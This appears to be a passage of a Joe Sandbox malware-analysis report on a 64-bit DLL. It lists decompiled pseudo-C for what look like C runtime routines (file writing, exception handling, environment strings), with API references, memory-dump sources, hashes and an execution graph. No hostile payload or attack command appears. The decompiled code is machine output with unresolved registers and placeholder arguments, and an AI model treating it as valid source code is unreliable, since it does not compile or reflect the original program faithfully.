                                                                                                      0x7ff87c101da2
                                                                                                      0x7ff87c101da7
                                                                                                      0x7ff87c101db1
                                                                                                      0x7ff87c101dce
                                                                                                      0x7ff87c101deb

                                                                                                      APIs
                                                                                                        • Part of subcall function 00007FF87C102250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C10226B
                                                                                                        • Part of subcall function 00007FF87C102250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C10227C
                                                                                                      • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C101D0E
                                                                                                        • Part of subcall function 00007FF87C1018F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF87C1018FE
                                                                                                        • Part of subcall function 00007FF87C101DF0: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FF87C101E56
                                                                                                        • Part of subcall function 00007FF87C101DF0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C101E98
                                                                                                        • Part of subcall function 00007FF87C101DF0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C101EAC
                                                                                                        • Part of subcall function 00007FF87C101DF0: char_traits.LIBCPMTD ref: 00007FF87C101EDB
                                                                                                      • _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FF87C101D60
                                                                                                      • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C101DA2
                                                                                                      • char_traits.LIBCPMTD ref: 00007FF87C101DCE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::Work$Base::ContextIdentityQueue$Mtx_guardMtx_guard::~_char_traits$EmptyQueue::Structured
                                                                                                      • String ID:
                                                                                                      • API String ID: 3922470843-0
                                                                                                      • Opcode ID: 4dd965a4b7583710b631a5fedce481fd092c87ca81ad6a4c948c4480f87ae1a4
                                                                                                      • Instruction ID: 7d3e1d4eae95850007e973a6e013f513290022b695afc8a4c3e278d53c1cf0e8
                                                                                                      • Opcode Fuzzy Hash: 4dd965a4b7583710b631a5fedce481fd092c87ca81ad6a4c948c4480f87ae1a4
                                                                                                      • Instruction Fuzzy Hash: 8021BF2362CA8581DB10EB56E45126EA370FBCABC0F604036FB9D47B6ADE7DD5908B50
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 50%
                                                                                                      			E00007FF87FF87C101DF0(intOrPtr* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
                                                                                                      				long long _v24;
                                                                                                      				long long _v32;
                                                                                                      				long long _v40;
                                                                                                      				void* _t44;
                                                                                                      				intOrPtr* _t49;
                                                                                                      				intOrPtr* _t51;
                                                                                                      				long long _t53;
                                                                                                      				intOrPtr* _t54;
                                                                                                      				intOrPtr _t61;
                                                                                                      
                                                                                                      				_t49 = __rax;
                                                                                                      				_a32 = __r9;
                                                                                                      				_a24 = __r8;
                                                                                                      				_a16 = __rdx;
                                                                                                      				_a8 = __rcx;
                                                                                                      				E00007FF87FF87C1021F0(_t44, __rax, _a16, _a24);
                                                                                                      				E00007FF87FF87C102400(_t44, __rax, _a16, _a24, _a32);
                                                                                                      				_a32 = _t49;
                                                                                                      				E00007FF87FF87C102170(_t49, _a8);
                                                                                                      				_t61 =  *0x7c17a228; // 0xffffffffffffffff
                                                                                                      				_t51 = _t61 -  *_t49;
                                                                                                      				if (_t51 - _a32 > 0) goto 0x7c101e5b;
                                                                                                      				E00007FF87FF87C102230(_a8);
                                                                                                      				E00007FF87FF87C102170(_t51, _a8);
                                                                                                      				_t53 =  *_t51 + _a32;
                                                                                                      				_v40 = _t53;
                                                                                                      				if (_a32 <= 0) goto 0x7c101eef;
                                                                                                      				r8d = 0;
                                                                                                      				if ((E00007FF87FF87C1022B0(_t53, _a8, _v40) & 0x000000ff) == 0) goto 0x7c101eef;
                                                                                                      				E00007FF87FF87C1018D0(_t53, _a16);
                                                                                                      				_t54 = _t53 + _a24;
                                                                                                      				_v24 = _t54;
                                                                                                      				E00007FF87FF87C1018F0(_t54, _a8);
                                                                                                      				_v32 = _t54;
                                                                                                      				E00007FF87FF87C102170(_t54, _a8);
                                                                                                      				E00007FF87FF87C1011E0(_v32 +  *_t54, _v24, _a32);
                                                                                                      				return E00007FF87FF87C1023A0(_v32 +  *_t54, _a8, _v40);
                                                                                                      			}












                                                                                                      0x7ff87c101df0
                                                                                                      0x7ff87c101df0
                                                                                                      0x7ff87c101df5
                                                                                                      0x7ff87c101dfa
                                                                                                      0x7ff87c101dff
                                                                                                      0x7ff87c101e12
                                                                                                      0x7ff87c101e26
                                                                                                      0x7ff87c101e2b
                                                                                                      0x7ff87c101e35
                                                                                                      0x7ff87c101e3d
                                                                                                      0x7ff87c101e47
                                                                                                      0x7ff87c101e4f
                                                                                                      0x7ff87c101e56
                                                                                                      0x7ff87c101e60
                                                                                                      0x7ff87c101e68
                                                                                                      0x7ff87c101e6d
                                                                                                      0x7ff87c101e78
                                                                                                      0x7ff87c101e7a
                                                                                                      0x7ff87c101e91
                                                                                                      0x7ff87c101e98
                                                                                                      0x7ff87c101e9d
                                                                                                      0x7ff87c101ea2
                                                                                                      0x7ff87c101eac
                                                                                                      0x7ff87c101eb1
                                                                                                      0x7ff87c101ebb
                                                                                                      0x7ff87c101edb
                                                                                                      0x7ff87c101ef8

                                                                                                      APIs
                                                                                                        • Part of subcall function 00007FF87C1021F0: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FF87C102217
                                                                                                        • Part of subcall function 00007FF87C102170: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF87C10217E
                                                                                                      • _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FF87C101E56
                                                                                                      • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C101E98
                                                                                                      • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C101EAC
                                                                                                      • char_traits.LIBCPMTD ref: 00007FF87C101EDB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::Work$Base::ContextIdentityMtx_guardMtx_guard::~_Queue$EmptyQueue::Structuredchar_traits
                                                                                                      • String ID:
                                                                                                      • API String ID: 3679362534-0
                                                                                                      • Opcode ID: 980ae18186fb1950204f52d148c7e17274a98d6da8dd13de02d4ec76e85661ca
                                                                                                      • Instruction ID: 1d2b472973573858ad095fd7873b69b11b6ad54712a6d5c365ffeb4dbb969bbc
                                                                                                      • Opcode Fuzzy Hash: 980ae18186fb1950204f52d148c7e17274a98d6da8dd13de02d4ec76e85661ca
                                                                                                      • Instruction Fuzzy Hash: 2621CD73628B4581DB10DB56E49126EA760FBCABD0F000036FA9D47B6ADE7CD5908B50
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 56%
                                                                                                      			E00007FF87FF87C111004(signed int __edx, void* __edi, void* __rax, signed long long __rbx, intOrPtr* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed int _a5176, void* _a5192) {
                                                                                                      				intOrPtr _v0;
                                                                                                      				signed long long _v8;
                                                                                                      				void* __rdi;
                                                                                                      				void* __rsi;
                                                                                                      				signed int _t41;
                                                                                                      				signed long long _t62;
                                                                                                      				short* _t67;
                                                                                                      				signed int* _t68;
                                                                                                      				intOrPtr* _t74;
                                                                                                      				intOrPtr* _t76;
                                                                                                      				void* _t84;
                                                                                                      				void* _t88;
                                                                                                      				signed short* _t89;
                                                                                                      				void* _t91;
                                                                                                      				void* _t94;
                                                                                                      				signed short* _t97;
                                                                                                      				void* _t99;
                                                                                                      				void* _t101;
                                                                                                      				void* _t103;
                                                                                                      				void* _t106;
                                                                                                      				void* _t107;
                                                                                                      
                                                                                                      				_t97 = __r8;
                                                                                                      				_t76 = __rcx;
                                                                                                      				_a8 = __rbx;
                                                                                                      				_a24 = __rbp;
                                                                                                      				E00007FF87FF87C112DE0(__edx, __rax, __rbx, __rcx, _t84, _t88, _t91, __r8, _t99, _t101, _t103);
                                                                                                      				_t62 =  *0x7c17e008; // 0xb442f0549439
                                                                                                      				_a5176 = _t62 ^ _t94 - __rax;
                                                                                                      				_t74 = _t76;
                                                                                                      				r14d = r9d;
                                                                                                      				r10d = r10d & 0x0000003f;
                                                                                                      				_t107 = _t106 + _t97;
                                                                                                      				_t89 = _t97;
                                                                                                      				 *_t74 =  *((intOrPtr*)(0x7c17f940 + (__edx >> 6) * 8));
                                                                                                      				 *((intOrPtr*)(_t74 + 8)) = 0;
                                                                                                      				if (_t97 - _t107 >= 0) goto 0x7c111145;
                                                                                                      				_t67 =  &_a40;
                                                                                                      				if (_t89 - _t107 >= 0) goto 0x7c1110ae;
                                                                                                      				_t41 =  *_t89 & 0x0000ffff;
                                                                                                      				if (_t41 != 0xa) goto 0x7c11109a;
                                                                                                      				 *_t67 = 0xd;
                                                                                                      				_t68 = _t67 + 2;
                                                                                                      				 *_t68 = _t41;
                                                                                                      				if ( &(_t68[0]) -  &_a1744 < 0) goto 0x7c11107c;
                                                                                                      				_a16 = _a16 & 0x00000000;
                                                                                                      				_a8 = _a8 & 0x00000000;
                                                                                                      				_v0 = 0xd55;
                                                                                                      				_v8 =  &_a1752;
                                                                                                      				r9d = 0;
                                                                                                      				E00007FF87FF87C10D698();
                                                                                                      				if (0 == 0) goto 0x7c11113d;
                                                                                                      				if (0 == 0) goto 0x7c11112d;
                                                                                                      				_v8 = _v8 & 0x00000000;
                                                                                                      				r8d = 0;
                                                                                                      				r8d = r8d;
                                                                                                      				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x7c11113d;
                                                                                                      				if (0 + _a24 < 0) goto 0x7c1110fa;
                                                                                                      				 *((intOrPtr*)(_t74 + 4)) = __edi - r15d;
                                                                                                      				goto 0x7c111071;
                                                                                                      				 *_t74 = GetLastError();
                                                                                                      				return E00007FF87FF87C103A70(_t39, 0, 0, _a5176 ^ _t94 - __rax);
                                                                                                      			}
























                                                                                                      0x7ff87c111004
                                                                                                      0x7ff87c111004
                                                                                                      0x7ff87c111004
                                                                                                      0x7ff87c111009
                                                                                                      0x7ff87c11101b
                                                                                                      0x7ff87c111023
                                                                                                      0x7ff87c11102d
                                                                                                      0x7ff87c111038
                                                                                                      0x7ff87c11103e
                                                                                                      0x7ff87c11104c
                                                                                                      0x7ff87c111050
                                                                                                      0x7ff87c111056
                                                                                                      0x7ff87c111068
                                                                                                      0x7ff87c11106e
                                                                                                      0x7ff87c111071
                                                                                                      0x7ff87c111077
                                                                                                      0x7ff87c11107f
                                                                                                      0x7ff87c111081
                                                                                                      0x7ff87c11108c
                                                                                                      0x7ff87c111093
                                                                                                      0x7ff87c111096
                                                                                                      0x7ff87c11109a
                                                                                                      0x7ff87c1110ac
                                                                                                      0x7ff87c1110ae
                                                                                                      0x7ff87c1110b9
                                                                                                      0x7ff87c1110c7
                                                                                                      0x7ff87c1110da
                                                                                                      0x7ff87c1110df
                                                                                                      0x7ff87c1110e9
                                                                                                      0x7ff87c1110f2
                                                                                                      0x7ff87c1110f8
                                                                                                      0x7ff87c1110fa
                                                                                                      0x7ff87c11110f
                                                                                                      0x7ff87c111118
                                                                                                      0x7ff87c111123
                                                                                                      0x7ff87c11112b
                                                                                                      0x7ff87c111132
                                                                                                      0x7ff87c111138
                                                                                                      0x7ff87c111143
                                                                                                      0x7ff87c111173

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                      • String ID: U
                                                                                                      • API String ID: 442123175-4171548499
                                                                                                      • Opcode ID: f98079f3c4aa1eb608d226a3e204fe1cd29820aa8a2509467dcded0e9b762ee9
                                                                                                      • Instruction ID: 2a5922f2e341c22182ac35dee1b0d71bf50ec34f188af4678aaaec01378e1016
                                                                                                      • Opcode Fuzzy Hash: f98079f3c4aa1eb608d226a3e204fe1cd29820aa8a2509467dcded0e9b762ee9
                                                                                                      • Instruction Fuzzy Hash: E041C323B28A8186EB20CF25E4443AAA7A0FB897D4F954031EE4D87798DF3CD481C760
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 100%
                                                                                                      			E00007FF87FF87C112EB4(intOrPtr* __rcx) {
                                                                                                      				void* __rbx;
                                                                                                      				void* _t3;
                                                                                                      				void* _t7;
                                                                                                      				void* _t10;
                                                                                                      				void* _t11;
                                                                                                      				void* _t12;
                                                                                                      				void* _t13;
                                                                                                      
                                                                                                      				_t3 = E00007FF87FF87C106B4C(_t7, __rcx, __rcx, _t10, _t11, _t12, _t13);
                                                                                                      				if (( *(__rcx + 4) & 0x00000066) != 0) goto 0x7c112ed5;
                                                                                                      				if ( *__rcx != 0xe06d7363) goto 0x7c112ed5;
                                                                                                      				if (_t3 == 1) goto 0x7c112edb;
                                                                                                      				return _t3;
                                                                                                      			}










                                                                                                      0x7ff87c112ebd
                                                                                                      0x7ff87c112ec6
                                                                                                      0x7ff87c112ece
                                                                                                      0x7ff87c112ed3
                                                                                                      0x7ff87c112eda

                                                                                                      APIs
                                                                                                      • __C_specific_handler.LIBVCRUNTIME ref: 00007FF87C112EBD
                                                                                                        • Part of subcall function 00007FF87C106B4C: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FF87C106C0C
                                                                                                        • Part of subcall function 00007FF87C106B4C: RtlUnwindEx.KERNEL32 ref: 00007FF87C106C5B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: C_specific_handlerCurrentImageNonwritableUnwind
                                                                                                      • String ID: csm$f
                                                                                                      • API String ID: 1396615161-629598281
                                                                                                      • Opcode ID: 8a5be923c7cc1b99aa4a0096ba3a69dd8979e15323e2be363a2fe093e1ce8b04
                                                                                                      • Instruction ID: 8d76056d45e523c9f49ffbd1944de9ff94806116323cd3d4e5236fb4cbef553a
                                                                                                      • Opcode Fuzzy Hash: 8a5be923c7cc1b99aa4a0096ba3a69dd8979e15323e2be363a2fe093e1ce8b04
                                                                                                      • Instruction Fuzzy Hash: 39D05E53E2A14A86FB392575904537C15905F1E7A4E088470C96806286AE1D98D04621
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClassCursorLoadRegister
                                                                                                      • String ID: P
                                                                                                      • API String ID: 1693014935-3110715001
                                                                                                      • Opcode ID: 29bdbaf3f29e2b1f60e2da6c671781d039cfe66c367808efb662ff8ab2e4e8d5
                                                                                                      • Instruction ID: 23e2864b2276503fa98b22f8a33f1ab4bbae52402cead63deeefcacc20361c0a
                                                                                                      • Opcode Fuzzy Hash: 29bdbaf3f29e2b1f60e2da6c671781d039cfe66c367808efb662ff8ab2e4e8d5
                                                                                                      • Instruction Fuzzy Hash: 0701AF32529B8086E7608F00F89835AB7B4F789788F600129E6CD46BA8DFBDD158CB44
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 37%
                                                                                                      			E00007FF87FF87C10472C(void* __eflags, void* __rax) {
                                                                                                      				char _v40;
                                                                                                      				void* _t6;
                                                                                                      				void* _t11;
                                                                                                      				void* _t12;
                                                                                                      				char* _t14;
                                                                                                      				void* _t16;
                                                                                                      
                                                                                                      				E00007FF87FF87C1045C0(__rax,  &_v40);
                                                                                                      				_t14 =  &_v40;
                                                                                                      				_t6 = E00007FF87FF87C106E00(_t12, _t14, 0x7c17cbd8, _t16);
                                                                                                      				asm("int3");
                                                                                                      				_t11 =  !=  ?  *((void*)(_t14 + 8)) : "Unknown exception";
                                                                                                      				return _t6;
                                                                                                      			}









                                                                                                      0x7ff87c104735
                                                                                                      0x7ff87c104741
                                                                                                      0x7ff87c104746
                                                                                                      0x7ff87c10474b
                                                                                                      0x7ff87c104758
                                                                                                      0x7ff87c10475d

                                                                                                      APIs
                                                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF87C104735
                                                                                                      • _CxxThrowException.LIBVCRUNTIME ref: 00007FF87C104746
                                                                                                        • Part of subcall function 00007FF87C106E00: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF87C10472B), ref: 00007FF87C106E7D
                                                                                                        • Part of subcall function 00007FF87C106E00: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF87C10472B), ref: 00007FF87C106EBC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                                                                      • String ID: Unknown exception
                                                                                                      • API String ID: 3561508498-410509341
                                                                                                      • Opcode ID: 245809459ad59a2729b59716ed244728fe2af4985c2eaed7b011566377c0e5b0
                                                                                                      • Instruction ID: 88078eea60911f1e13de9ff62e7596382921f3edaed9aad793a1e33bca696de7
                                                                                                      • Opcode Fuzzy Hash: 245809459ad59a2729b59716ed244728fe2af4985c2eaed7b011566377c0e5b0
                                                                                                      • Instruction Fuzzy Hash: 57D01723A28A86D5EF10DB00D8803A86330FB81388F904532E14C439B1DF2CD6CAC360
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:10%
                                                                                                      Dynamic/Decrypted Code Coverage:2.3%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:899
                                                                                                      Total number of Limit Nodes:7
                                                                                                      execution_graph 17981 7ff87c10a068 17982 7ff87c10a081 17981->17982 17991 7ff87c10a07d 17981->17991 17996 7ff87c10d24c 17982->17996 17987 7ff87c10a09f 18022 7ff87c10a0dc 17987->18022 17988 7ff87c10a093 17989 7ff87c10a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17988->17989 17989->17991 17993 7ff87c10a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17994 7ff87c10a0c6 17993->17994 17995 7ff87c10a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17994->17995 17995->17991 17997 7ff87c10d259 17996->17997 17998 7ff87c10a086 17996->17998 18041 7ff87c10b9a8 17997->18041 18002 7ff87c10d748 GetEnvironmentStringsW 17998->18002 18003 7ff87c10d778 18002->18003 18004 7ff87c10a08b 18002->18004 18005 7ff87c10d698 WideCharToMultiByte 18003->18005 18004->17987 18004->17988 18006 7ff87c10d7c9 18005->18006 18007 7ff87c10d7d0 FreeEnvironmentStringsW 18006->18007 18008 7ff87c10aa18 _onexit 12 API calls 18006->18008 18007->18004 18009 7ff87c10d7e3 18008->18009 18010 7ff87c10d7eb 18009->18010 18011 7ff87c10d7f4 18009->18011 18012 7ff87c10a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18010->18012 18013 7ff87c10d698 WideCharToMultiByte 18011->18013 18014 7ff87c10d7f2 18012->18014 18015 7ff87c10d817 18013->18015 18014->18007 18016 7ff87c10d81b 18015->18016 18017 7ff87c10d825 18015->18017 18018 7ff87c10a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18016->18018 18019 7ff87c10a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18017->18019 18020 7ff87c10d823 FreeEnvironmentStringsW 18018->18020 18019->18020 18020->18004 18023 7ff87c10a101 18022->18023 18024 7ff87c10aad0 __vcrt_getptd_noexit 11 API calls 18023->18024 18035 7ff87c10a137 18024->18035 18025 7ff87c10a13f 18026 7ff87c10a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18025->18026 18027 7ff87c10a0a7 18026->18027 18027->17993 18028 7ff87c10a1b2 18029 7ff87c10a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18028->18029 18029->18027 18030 7ff87c10aad0 __vcrt_getptd_noexit 11 API calls 18030->18035 18031 7ff87c10a1a1 18331 7ff87c10a1ec 18031->18331 18035->18025 18035->18028 18035->18030 18035->18031 18036 7ff87c10a1d7 18035->18036 18039 7ff87c10a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18035->18039 18322 7ff87c10a97c 18035->18322 18038 7ff87c109794 _invalid_parameter_noinfo_noreturn 17 API calls 18036->18038 18037 7ff87c10a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18037->18025 18040 7ff87c10a1ea 18038->18040 18039->18035 18042 7ff87c10b9b9 FlsGetValue 18041->18042 18043 7ff87c10b9d4 FlsSetValue 18041->18043 18044 7ff87c10b9ce 18042->18044 18045 7ff87c10b9c6 18042->18045 18043->18045 18046 7ff87c10b9e1 18043->18046 18044->18043 18047 7ff87c10b9cc 18045->18047 18084 7ff87c10aa78 18045->18084 18049 7ff87c10aad0 __vcrt_getptd_noexit 11 API calls 18046->18049 18061 7ff87c10cf24 18047->18061 18051 7ff87c10b9f0 18049->18051 18052 7ff87c10ba0e FlsSetValue 18051->18052 18053 7ff87c10b9fe FlsSetValue 18051->18053 18055 7ff87c10ba1a FlsSetValue 18052->18055 18056 7ff87c10ba2c 18052->18056 18054 7ff87c10ba07 18053->18054 18058 7ff87c10a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18054->18058 18055->18054 18057 7ff87c10b640 _set_errno_from_matherr 11 API calls 18056->18057 18059 7ff87c10ba34 18057->18059 18058->18045 18060 7ff87c10a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18059->18060 18060->18047 18150 7ff87c10d194 18061->18150 18063 7ff87c10cf59 18165 7ff87c10cc24 18063->18165 18066 7ff87c10cf76 18066->17998 18069 7ff87c10cf8f 18070 7ff87c10a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18069->18070 18070->18066 18071 7ff87c10cf9e 18071->18071 18179 7ff87c10d2c8 18071->18179 18074 7ff87c10d09a 18075 7ff87c10b420 _set_errno_from_matherr 11 API calls 18074->18075 18077 7ff87c10d09f 18075->18077 18076 7ff87c10d0f5 18079 7ff87c10d15c 18076->18079 18190 7ff87c10ca54 18076->18190 18080 7ff87c10a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18077->18080 18078 7ff87c10d0b4 18078->18076 18081 7ff87c10a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18078->18081 18083 7ff87c10a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18079->18083 18080->18066 18081->18076 18083->18066 18093 7ff87c10e150 18084->18093 18119 7ff87c10e108 18093->18119 18124 7ff87c10bd28 EnterCriticalSection 18119->18124 18151 7ff87c10d1b7 18150->18151 18152 7ff87c10d1c1 18151->18152 18205 7ff87c10bd28 EnterCriticalSection 18151->18205 18154 7ff87c10d233 18152->18154 18157 7ff87c10aa78 FindHandler 47 API calls 18152->18157 18154->18063 18159 7ff87c10d24b 18157->18159 18160 7ff87c10d29e 18159->18160 18162 7ff87c10b9a8 52 API calls 18159->18162 18160->18063 18163 7ff87c10d288 18162->18163 18164 7ff87c10cf24 67 API calls 18163->18164 18164->18160 18206 7ff87c10b2b0 18165->18206 18168 7ff87c10cc44 GetOEMCP 18170 7ff87c10cc6b 18168->18170 18169 7ff87c10cc56 18169->18170 18171 7ff87c10cc5b GetACP 18169->18171 18170->18066 18172 7ff87c10aa18 18170->18172 18171->18170 18173 7ff87c10aa63 18172->18173 18177 7ff87c10aa27 __vcrt_getptd_noexit 18172->18177 18175 7ff87c10b420 _set_errno_from_matherr 11 API calls 18173->18175 18174 7ff87c10aa4a RtlAllocateHeap 18176 7ff87c10aa61 18174->18176 